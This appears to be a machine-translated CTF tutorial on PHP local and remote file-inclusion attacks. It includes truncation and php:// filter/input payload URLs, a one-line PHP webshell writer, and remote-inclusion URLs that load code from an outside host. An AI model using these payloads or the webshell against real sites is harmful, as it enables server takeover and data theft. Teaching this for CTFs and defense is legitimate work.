Often test file contains loopholes

Others 2020-04-09 15:50:31 views: null

File Inclusion Vulnerabilities

File contains the Introduction

Application developers in the process of writing a program, do not like to write several times a same code, so the code will usually require repeated use of a single written document, when you want to use directly call up the file, not the need to re-write, call this process is called contains. We need to call a file and they will by the PHP function reference file, if the file name is not passed in time after a reasonable verification, thereby operating a file other than expected, it will result in unexpected or even malicious file disclosure Code injection

Hazard function

PHP function in the file that contains the vulnerability of the most common are the following four:

require()
require_once()
include()
include_once()

When using these functions include a new file, as long as the contents of the file match the syntax of PHP, then expand any file name can be parsed as PHP, such as uploading a txt./ jpg contains malicious code. Files will PHP file is treated as execution.

classification

Local file contains
  • Flag directly read files on the target machine
Remote File Inclusion
  • On the designated third-party server that can run PHP Trojans, get webshell, view the flag file

Problem-solving ideas

View php global configuration file php.ini

   allow_url_fopen = on/off
   allow_url_include = on/off

Only these two are only open when there is a remote file containing

Local file contains

  • Direct file contains flag

  • Flag by reading the code PHP pseudo-protocol

  • Incoming Trojan PHP get webshell, get flag

Direct file contains flag

00% cut

Terminator: \ x00 ->% 00

Truncated path length

The maximum length of the directory under Windows 256 bytes, the excess will be discarded; directory under the Linux maximum length of 4096 bytes, the excess will be discarded. example:

http://www.ctfs-wiki.com/FI/FI.php?filename=test.txt/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.

No cut-off point

windows OS, number of points need to be longer than 256

http://www.ctfs-wiki.com/FI/FI.php?filename=test.txt..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

PHP pseudo-protocol

  • file: // - access to the local file system
  • php: // - to access the various input and output streams

file://

Usage: file: // [absolute path and file name of the file]

条件(php.ini) : allow_url_fopen = off/on ​ allow_url_include = off/on

php://filter

usage:

?filename=php://filter/convert.base64-encode/resource=xxx.php

条件(php.ini) : allow_url_fopen = off/on ​ allow_url_include = off/on

Incoming Trojan PHP get webshell, get flag

php://input

Usage:? File = php: // input data using the POST pass in the past

条件(php.ini) : allow_url_fopen = off/on ​ allow_url_include = on

Trojan file (shell.php)

<?PHP fputs(fopen('shell.php','w'),'<?php @eval($_POST[cmd])?>');?>

Kitchen knife / sword ant connection

Remote File Inclusion

Bypassing the question mark

http://www.ctfs-wiki.com/FI/WFI.php?filename=http://192.168.91.133/FI/php.txt?

# No. bypass

http://www.ctfs-wiki.com/FI/WFI.php?filename=http://192.168.91.133/FI/php.txt%23

20% bypass

http://www.ctfs-wiki.com/FI/WFI.php?filename=http://192.168.91.133/FI/php.txt%20

Guess you like

Origin www.cnblogs.com/NPFS/p/12667021.html
Recommended
Ranking
Linux关机和重启详解(shutdown、halt、poweroff、reboot、init)
Netty work notes 0007---NIO's three core component relationships
Knife4j tutorial
2021.10.29,内容:什么时候用接口和抽象类
How to solve the problem that changing the memory frequency causes the computer to become unusable?
SpringMVC Tutorial - Controller
linux learning skills -Linux 25 transport Vega paid special privileges and facl extension
Financial quarterly report evaluation report data automatic generation 1.0
Agile Development Series - The Values of Agile Development
scrapy achieve browsercookie Middleware
Daily
More
2024-05-19(0)
2024-05-18(31)
2024-05-17(6)
2024-05-16(23)
2024-05-15(5)
2024-05-14(9)
2024-05-13(8)
2024-05-12(28)
2024-05-11(32)
2024-05-10(34)

Code World

© 2018 codetd.com